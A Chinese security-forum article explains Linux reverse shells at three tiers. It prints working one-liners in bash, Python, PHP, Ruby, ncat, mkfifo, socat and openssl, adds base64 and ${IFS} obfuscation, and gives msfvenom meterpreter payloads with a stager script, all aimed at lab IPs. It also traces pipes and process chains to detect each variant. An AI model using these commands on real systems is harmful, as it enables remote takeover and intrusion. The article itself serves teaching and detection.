问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Linux系统下反弹shell的理解
漏洞分析
之前研究过一段时间的反弹shell,所以本文是我个人对反弹shell的理解,当然,本人才疏学浅,如有啥错的地方,各位师傅指出,共同学习一起进步!!!
0x00 定义 ======= 受害者由于某种原因**主动**向攻击者发起连接,攻击者可向受害者下发命令并得到命令执行结果,即**为反弹shell**。 > 某种原因,包括但不限于受害机器运行了远控木马(钓鱼邮件附件),存在RCE漏洞等 0x01 本质 ======= 网络通信+命令执行+重定向方式 - **网络通信**:可以使用TCP/UDP/ICMP等协议,TCP协议再细分又可以包含HTTP/HTTPS协议等,UDP包含DNS等; - **命令执行**:调用shell解释器、glibc库、Syscall等方式实现; - **重定向**:管道、伪终端、内存文件等 0x02 攻击手法 ========= 初级 -- 利用系统自带的 shell 进行反弹shell,命令无混淆 ### 1. 直接把shell的标准输入、输出、错误重定向到socket中(双向) bash将标准输出、标准错误输出、标准输入通过socket链接重定向至远程 #### bash ```bash sh -i >& /dev/tcp/172.16.0.104/1234 0>&1 ``` 先简单解释一下这个命令的意思 • `0`:标准输入、`1`:标准输出、`2`:标准错误 • `r`(可读)、`w`(可写)、`u`(可读+可写) • `>&`:标准输出+错误 • `/dev/tty` 终端、`/dev/pty` 虚拟终端 一开始: data:image/s3,"s3://crabby-images/b866e/b866eeac6b6bfbad4b35b427b7855153cebc5134" alt="image.png" `>& /dev/tcp/172.16.0.104/1234` 之后 data:image/s3,"s3://crabby-images/90e7b/90e7be395138481ec065f966061e587939f21664" alt="image.png" `0>&1`之后 data:image/s3,"s3://crabby-images/b748a/b748a77314e4a65c5da91bb24979dbb571fc825a" alt="image.png" 数据流图如下: data:image/s3,"s3://crabby-images/bc099/bc09958f55be4579466f26968b6f99f859d4580f" alt="image.png" 通过反弹的端口 1234 去排查shell data:image/s3,"s3://crabby-images/9f77c/9f77c86f0c923a4d35abf9a6fe1b2ae842f87f85" alt="image.png" 这里的shell,除了sh,还有如下: ```php bash、pwsh、ash、bsh、csh、ksh、zsh、tcsh等 ``` 此外,还有很多其他的例子 #### python ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.11.6",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` data:image/s3,"s3://crabby-images/6ee51/6ee518ff9d7f64c175b3a9ea4a6ef3f9661615c4" alt="image.png" 数据流图如下: data:image/s3,"s3://crabby-images/5d42e/5d42efff7e85fb6d090cad624456d116a7ee6e95" alt="image.png" #### php ```bash php -r '$sock=fsockopen("10.0.11.6",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ``` data:image/s3,"s3://crabby-images/628e6/628e649b509346fb5e268c7b984e1a1f559fd7bf" alt="image.png" data:image/s3,"s3://crabby-images/ecc85/ecc85bafd71e823420ded9385bae1e59341220f5" alt="image.png" data:image/s3,"s3://crabby-images/ca099/ca099f8567d6be7873ba9e11eff594e683c997f7" alt="image.png" 中级 -- 这一阶段分成两部分,一个是基于上面命令的混淆,还有一个是引入一个“中转”的机制 ### 1. 混淆(双向) base64编码 ```bash echo "sh -i >& /dev/tcp/172.16.0.104/1234 0>&1"|base64 c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjAuMTA0LzEyMzQgMD4mMQo= ``` ```bash {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjAuMTA0LzEyMzQgMD4mMQo=}|{base64,-d}|{bash,-i} ``` data:image/s3,"s3://crabby-images/fbc62/fbc62e1dcafdf8fa112f9af755f66725816ad516" alt="image.png" `${IFS}`代替空格 ```bash /bin/bash -c bash${IFS}-i${IFS}>& 172.16.0.104/1234<&1 ``` ### 2. 流量加密(双向) ```bash mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | openssl s_client -quiet -connect 172.16.0.104:1234 > /tmp/f ``` <https://www.cnblogs.com/heycomputer/articles/10697865.html> 这里主要讨论的是openssl流量的加密,管道在下面会分析 ### 3. 中转-管道 所谓“中转”,就是shell的标准输入、输出、错误**不直接**重定向到socket 中,而是在中间加入一个东西,即管道,然后再由管道连接 socket 不同进程之间通过管道相连接,最后通过多次管道定向至bash的输入输出 #### Ncat(双向) ```bash ncat 10.0.11.6 1234 -e /bin/bash ``` data:image/s3,"s3://crabby-images/aee3b/aee3b73749de98c56f18d04024b6e59b754d375b" alt="image.png" data:image/s3,"s3://crabby-images/0ca8c/0ca8cb0f9c456428a577a9d6a22e8d31a797c910" alt="image.png" data:image/s3,"s3://crabby-images/cb40f/cb40f51e11d28d72863f3fe150b615032203136d" alt="image.png" 双向证明: data:image/s3,"s3://crabby-images/5f10a/5f10acdad2eef3c522bc6140d2b8643b2f0c70f6" alt="image.png" #### mkfifo(双向) ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.16.0.104 1234 > /tmp/f ``` mkfifo 命令首先创建了一个管道,cat 将管道里面的内容输出传递给`/bin/sh`,sh会执行管道里的命令并将标准输出和标准错误输出结果通过`nc`传到该管道,由此形成了一个回路 在某些变形的场景下,可能经过层层中转,但无论经过几层最终都会形成一条流动的数据通道。通过跟踪fd和进程的关系可以覆盖 data:image/s3,"s3://crabby-images/f7c17/f7c176b8f3c5c65d7573abb061e00f98e0e50b29" alt="image.png" 如下,假设我们要追查`bash -i`: data:image/s3,"s3://crabby-images/0d8d8/0d8d8028fd03a13d26992b7fec8998deeee04303" alt="image.png" 上面查了639226管道,只查到了cat,下面查另一个管道639228,最终查到了nc对应的socket data:image/s3,"s3://crabby-images/079a1/079a19ef288e5c6de24786b4225f158e1eb9e1a8" alt="image.png" data:image/s3,"s3://crabby-images/9bed2/9bed21849a22c2848f1ec5478b037222d7fe0cbe" alt="image.png" 双向证明: data:image/s3,"s3://crabby-images/4088a/4088a8a6f178dd7631738282cd9b0bad8f5c5680" alt="image.png" #### mknod(双向) ```bash mknod backpipe p; nc 10.0.11.6 1234 0<backpipe | /bin/bash 1>backpipe 2>backpipe ``` data:image/s3,"s3://crabby-images/3c83d/3c83d4b8bb9e9eecf5cc656f70e10353cb56d875" alt="image.png" 双向证明: data:image/s3,"s3://crabby-images/3066c/3066cadd9a77acc08152f90135f30662c79ed698" alt="image.png" 总的来说,0,1,2标准输入输出、错误输出流被指向pipe管道,管道指向到另一个进程会有一个对外的socket链接,中间或许经过多层管道,但最终被定向到的进程必有一个socket链接。 高级 -- ### 1. 流量伪装 <https://github.com/krabelize/icmpdoor> <https://github.com/bdamele/icmpsh> [https://github.com/ahhh/Reverse\_DNS\_Shell](https://github.com/ahhh/Reverse_DNS_Shell) #### Icmpdoor(单向) data:image/s3,"s3://crabby-images/909a1/909a1ec6c5eb96f44e0e27567a391b2943883ae4" alt="image.png" 进程链: data:image/s3,"s3://crabby-images/aff2b/aff2b340b2ec5a3f9b2125d859a7a8f028d07dc6" alt="image.png" data:image/s3,"s3://crabby-images/7cc94/7cc94ef1458d06326616753aad9919cb0f9ea1fb" alt="image.png" data:image/s3,"s3://crabby-images/724d6/724d6d05d7f5ed8be5e8f032eaa8d0af693f3c2b" alt="image.png" ### 2. 标准输入由代码处理(无落地)(单向) 编程语言实现标准输入中转,重定向命令执行的输入到中转,标准输出和标准错误中转形式不限制。 ```bash python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.0.11.6',1234))\nwhile 1: proc = subprocess.Popen(s.recv(1024), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True);s.send(proc.stdout.read()+proc.stderr.read())\")" ``` 首先建立了一个socket,然后进入死循环。循环里面,启动了一个shell进程,输入由socket控制,输出和误都指向一个管道。命令执行完后,将输出和错误通过socket发送出去 data:image/s3,"s3://crabby-images/5ffae/5ffaeeba0fb61b44cd7b34366263162e15a326f1" alt="image.png" data:image/s3,"s3://crabby-images/32a1d/32a1d7dc2ba9f6b8ac868623248da2a206b3198e" alt="image.png" 注意: 1. 执行完命令,shell立刻关闭,因此测试的时候,进行了长ping 2. 一执行命令shell就往管道写 查看进程链,执行同样的命令,每次启动的shell都不一样,shell执行完后就关闭了 这里的图片用的是旧的,所以进程id对应不上 data:image/s3,"s3://crabby-images/5f621/5f6210bad2dffa5911d1f8a3a31fb1b12ef50bc2" alt="image.png" data:image/s3,"s3://crabby-images/e2569/e2569c5df859e82d88d9bd6d5017bbaab6537b50" alt="image.png" 单向证明: data:image/s3,"s3://crabby-images/9f88a/9f88abef39269fd19e7f0f356ebd7fe8f5ecfc53" alt="image.png" 还有以下: ```bash python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.0.104',1234))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")" ``` data:image/s3,"s3://crabby-images/d8ddf/d8ddf0fb29e7167b626c757e21c6e0901de81193" alt="image.png" data:image/s3,"s3://crabby-images/73129/73129e55cfd298949da45977eba2d8170a4701ce" alt="image.png" ```bash ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.11.6","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` data:image/s3,"s3://crabby-images/b383b/b383bf2d11ff706037eb43c68488c85bd76e16dd" alt="image.png" data:image/s3,"s3://crabby-images/9eaba/9eaba9adc2b25d1130a6ce840861d817f91b97fb" alt="image.png" ### 3. 伪终端 pty 这类的攻击,特征就是shell的基本输入输出错误都重定向到了 `/dev/pts`,且恶意程序会打开`/dev/ptmx`,且会有socket外连 #### socat(双向) ```bash # 反弹命令 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.6:1234 # 监听命令 socat file:`tty`,raw,echo=0 tcp-listen:1234 ``` data:image/s3,"s3://crabby-images/c0c3c/c0c3c4f0b20bee2c56bed1bf86dfa80809ee9616" alt="image.png" 先从进程入手 data:image/s3,"s3://crabby-images/6bcd1/6bcd10bdacde29afe3541fdd0b4abff27b3ee48c" alt="image.png" data:image/s3,"s3://crabby-images/3f07b/3f07b7a5e4f4a7b51850784966f6cc5a8d74d21a" alt="image.png" 再在攻击者上查看当前tty,看是否是`/dev/pts/2` data:image/s3,"s3://crabby-images/ba90f/ba90f78e84354d90d92fac46b0f80b1113f63318" alt="image.png" #### Python(双向) ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.11.6",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` data:image/s3,"s3://crabby-images/5d58d/5d58d0028057d5924e4ad7238ec446760c5a7dc3" alt="image.png" data:image/s3,"s3://crabby-images/27b44/27b44ef9c3f4fc5131a1db3f43ae35b385b42a80" alt="image.png" data:image/s3,"s3://crabby-images/a496d/a496d97f9f9f22e5a59b2dadb5cc4cf23aa499fe" alt="image.png" #### msf-python/meterpreter/reverse\_tcp(双向) ```bash # 控制端 msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.11.6 LPORT=1234 -f raw -o /tmp/mrtp.py msfconsole msf5 > use exploit/multi/handler msf5 > set PAYLOAD python/meterpreter/reverse_tcp msf5 > set LHOST 10.0.11.6 msf5 > set LPORT 1234 msf5 > run # 被控端 python3 mrtp.py ``` `mrtp.py` 如下: ```python import socket import zlib import base64 import struct import time for x in range(10): try: s = socket.socket(2, socket.SOCK_STREAM) s.connect(('10.0.11.6', 1234)) break except: time.sleep(5) l = struct.unpack('>I', s.recv(4))[0] d = s.recv(l) while len(d) < l: d += s.recv(l - len(d)) exec(zlib.decompress(base64.b64decode(d)), {'s': s}) ``` data:image/s3,"s3://crabby-images/d7e4b/d7e4b447b24ded6a548900cbb44a1bf325d3dfc6" alt="image.png" data:image/s3,"s3://crabby-images/31abd/31abdc2227c8c09d916ab6f009f407ac9f2ca805" alt="image.png" data:image/s3,"s3://crabby-images/34569/3456952099084fa2725d89866f8350d0abddcaf7" alt="image.png" data:image/s3,"s3://crabby-images/e56ad/e56ad53b0d0809df52f1c323d6eecd2cf8cfea22" alt="image.png" 双向证明: data:image/s3,"s3://crabby-images/8a64c/8a64c603a4a125e162c84e80e509e80449ec00f1" alt="image.png" ### 4. 非交互式shell-远控木马 #### 1. 恶意程序负责socket通信,如 msf-meterpreter/reverse\_tcp 恶意程序负责socket通信,同时把命令写到管道1中,shell从管道1中读取命令执行,并把结果写到管道2,恶意程序从管道2中读取数据,通过socket回传给攻击者。 data:image/s3,"s3://crabby-images/b0b02/b0b02a374ca07e368ab9eb5fddca33a8fef0c292" alt="image.png" ```bash # 控制端 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.11.6 LPORT=1234 -f elf -o /tmp/exp msfconsole msf5 > use exploit/multi/handler msf5 > set payload linux/x64/meterpreter/reverse_tcp msf5 > set LHOST 10.0.11.6 msf5 > set LPORT 1234 msf5 > run # 被控端 chmod 777 exp ./exp ``` data:image/s3,"s3://crabby-images/2a224/2a224d048f4d3ae74d6c1060890feb6f485f6a8f" alt="image.png" data:image/s3,"s3://crabby-images/d4c7c/d4c7ca9bb10cb6ab9f258781cf9d570e4539fa6c" alt="image.png" data:image/s3,"s3://crabby-images/53a6e/53a6e633fb2e2b9d5eb796a39ec37cc687fa42b1" alt="image.png" #### 2. 自定义shell 自定义一个shell,不使用系统自带的shell。 以 ls 命令为例子,功能是查看目录中有哪些文件,假如我们不想使用ls命令,那我们有什么办法呢? 那就自己写一个类似功能程序的代码,然后执行就可以了。 以 python shellcode为例子(你也可以写汇编 shellcode): ```python ls_shellcode = ''' import os dst_path = '{dst_path}' dirs = os.listdir(dst_path) for file in dirs: print(file) ''' exec(ls_shellcode.format(dst_path = "C:/")) ``` 输出: ```php $Recycle.Bin DocumentsandSettings Intel pagefile.sys PerfLogs ProgramFiles .... ``` 这样根本不会出现启动系统自带的shell,为了更加隐蔽,还可以把shellcode通过网络传输。 再看现有的解决方案:以 <https://github.com/rapid7/mettle> 为例子,内置了一些的常用命令 data:image/s3,"s3://crabby-images/e9d67/e9d676514383b2f36d56d729f354c9604ee6f816" alt="image.png" 具体代码本人还在研究中。。。 0x03 总结 ======= 这是我自己对linux反弹shell的一些理解,也是按照我自己的理解对其进行了分级,分成初中高级。。。可能会存在争论,又或者有一些我不曾知道的手法,欢迎各位师傅一起讨论啊! 在学习研究过程中,也参考了一些师傅的文章,因为时间太过长远了,已经忘了参考了哪些文章了,如果师傅们在看本文的过程中,发现有一些思路有师傅写过,需要我加上参考链接的,欢迎随时Q我:)
发表于 2024-11-21 09:00:00
阅读 ( 1686 )
分类:
其他
6 推荐
收藏
1 条评论
c铃儿响叮当
2024-11-30 23:42
tql
请先
登录
后评论
请先
登录
后评论
江小虫儿
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!